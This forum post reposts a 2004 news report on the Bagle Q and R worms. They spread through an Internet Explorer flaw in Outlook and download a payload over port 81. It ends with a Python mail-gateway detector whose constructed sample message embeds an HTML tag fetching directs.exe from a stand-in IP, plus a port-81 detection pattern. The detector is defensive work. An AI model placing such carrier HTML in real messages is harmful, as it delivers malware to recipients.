MacG
03-19-2004, 4:55 AM
IE bug in Outlook lets in Bagle Q and R viruses - [Computer Security]
Reports are already flooding in to antivirus companies across the globe of new variants of the Bagle virus that spread without the recipient opening an attachment but through a hole in Internet Explorer.
'As the UK comes into work this morning there's a real danger that these Bagle worms will take off - we've already had a high number of reports from other parts of the world - particularly Korea, which is known for its uptake and use of technology,' said Graham Cluley, senior technology consultant, Sophos. 'Exploiting a security loophole in the popular Microsoft Outlook email system means these worms have the potential to hit hard. Both home and business computer users need to make sure they are patched against all vulnerabilities.'
The flaw, for which Microsoft issued a patch in October of last year, lies in the way Internet Explorer handles content received from a web server and, if left unpatched, allows an attacker to run code on the target system. In this case it is exploited through an email whose body embeds a small amount of HTML that triggers the flaw, because Outlook uses Internet Explorer's HTML rendering engine to display messages.
When the message is opened, the hidden HTML pulls down a script, which in turn downloads the Bagle Q or R virus either from the sender's infected computer or from one of a list of 100 or so IP addresses, and writes it to the hard disk as directs.exe.
The viruses also place copies in folders used by peer-to-peer file-sharing systems, infect .exe files found on the disk and edit the Registry to make sure they are run each time the system is started.
In addition, Bagle Q and R attempt to turn off the activities of many security programs on the system.
Trend Micro says it has also encountered versions of these latest viruses that carry the virus in an attachment as well.
Cluley said the characteristics of the email make it particularly difficult to be vigilant against. 'The subject line is randomly chosen,' he said. 'There is no visible message body, although it does - of course - include the hidden exploit code which downloads the rest of the worm... but going by "what the email looks like" is never a good way to protect yourself.'
The hidden code in the 'carrier' emails fetches the virus over TCP port 81. Anyone comfortable with firewall rules, or running a user-friendly personal firewall, should block that port: the download then cannot complete, and an already infected machine cannot serve the virus to further victims.
Cluley said that there 'were not many reports from the UK yet... One major reason that Korea has been so badly affected is that they are more advanced in broadband technology'. However, he said new variants S and T of Bagle were already being analysed and are likely to be even more sophisticated than R and Q, so numbers may well rise.
David Kopp, Director of TrendLabs EMEA, said: 'The challenge is to help the security administrators with protection against these network viruses. We have already discovered three other variants that take advantage of these vulnerabilities: Bagle.R, .S and .T. Virus writers know how difficult it is to patch all the computers of a corporate network and don't hesitate to use this weakness.'
The new Bagles do appear to be by the same author as earlier versions. 'We believe they contain references to the white rabbit, which indicates that they may well be connected with earlier versions of Bagle,' said Cluley, referring to the recent Bagle N and O viruses.
As ever, updated antivirus and firewall software and timely patching are the easiest and surest way to defend against these new viruses. 'Bagle is a wake up call about the need for holistic security. By keeping on top of security patches, anti-virus software updates and ensuring firewalls are properly installed, users can lessen their chances of getting hit,' continued Cluley. 'If you don't patch yourself against these kinds of threats, you shouldn't be surprised if a worm bites you on the backside.'
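As an added example (not code from the article, and not from Sophos or Trend Micro), here is a small mail-gateway heuristic in Python that flags the two traits the article attributes to the carrier messages: an HTML body with active content (object, script, iframe, embed) but no visible text, and a URL that fetches from TCP port 81. The three sample messages are constructed; the `<object>` tag shape, the 192.0.2.10 address and the example.* domains are assumptions for illustration, not the worm's real exploit code.

```python
"""Mail-gateway heuristic for Bagle-style 'carrier' messages.

Added example, not code from the article or from any antivirus vendor.
It flags HTML mail that carries active content with no visible body text,
and URLs that fetch from TCP port 81, the download channel the article
describes.  The sample messages below are constructed, not real traffic.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "object", "iframe", "embed", "applet"}
URL_ATTRS = {"src", "data", "href", "codebase"}
# Scheme, host, then an explicit ':81' followed by a path or end of string
# (so 'host:810/' does not match).
PORT81_RE = re.compile(r"^(?:https?|ftp)://[^/:\s]+:81(?:/|$)", re.IGNORECASE)


class _HtmlScan(HTMLParser):
    """Collect active tags, URL attributes and visible text from one HTML part."""

    def __init__(self):
        super().__init__()
        self.active_tags = []
        self.urls = []
        self.visible_text = []
        self._in_raw = False  # inside <script>/<style>: that text is not shown

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.active_tags.append(tag)
        if tag in ("script", "style"):
            self._in_raw = True
        for name, value in attrs:
            if value and name.lower() in URL_ATTRS:
                self.urls.append(value.strip())

    def handle_endtag(self, tag):
        if tag.lower() in ("script", "style"):
            self._in_raw = False

    def handle_data(self, data):
        if not self._in_raw and data.strip():
            self.visible_text.append(data.strip())


def scan_message(raw: bytes) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scan = _HtmlScan()
        scan.feed(part.get_content())  # decodes the transfer encoding for us
        scan.close()
        port81 = [u for u in scan.urls if PORT81_RE.match(u)]
        if port81:
            reasons.append("fetch from port 81: " + ", ".join(port81))
        if scan.active_tags and not scan.visible_text:
            tags = ", ".join(sorted(set(scan.active_tags)))
            reasons.append("active content (%s) with no visible body" % tags)
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed samples.  The carrier mimics what the article describes: a random
# subject, an empty-looking body and hidden HTML pointing at port 81 on another
# host.  The tag used is an assumption, not the worm's actual exploit.
CARRIER = b"""From: a@example.net
To: b@example.org
Subject: Qx7h
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body>
<object data="http://192.0.2.10:81/directs.exe"></object>
</body></html>
"""

NEWSLETTER = b"""From: news@example.com
To: b@example.org
Subject: Weekly update
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body><p>Hello, here is <a href="http://www.example.com/news">the news</a>.</p></body></html>
"""

PLAIN = b"""From: c@example.org
To: b@example.org
Subject: lunch?
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

See you at noon.
"""

if __name__ == "__main__":
    for name, sample in (("carrier", CARRIER), ("newsletter", NEWSLETTER), ("plain", PLAIN)):
        print(name, scan_message(sample))
```

The two checks are deliberately independent: the port-81 test catches the download channel even if a later variant fills the body with decoy text, while the empty-body-with-active-content test catches a carrier that moves its download to another port. Neither replaces the patch; an unpatched Outlook will still render whatever HTML gets past the gateway.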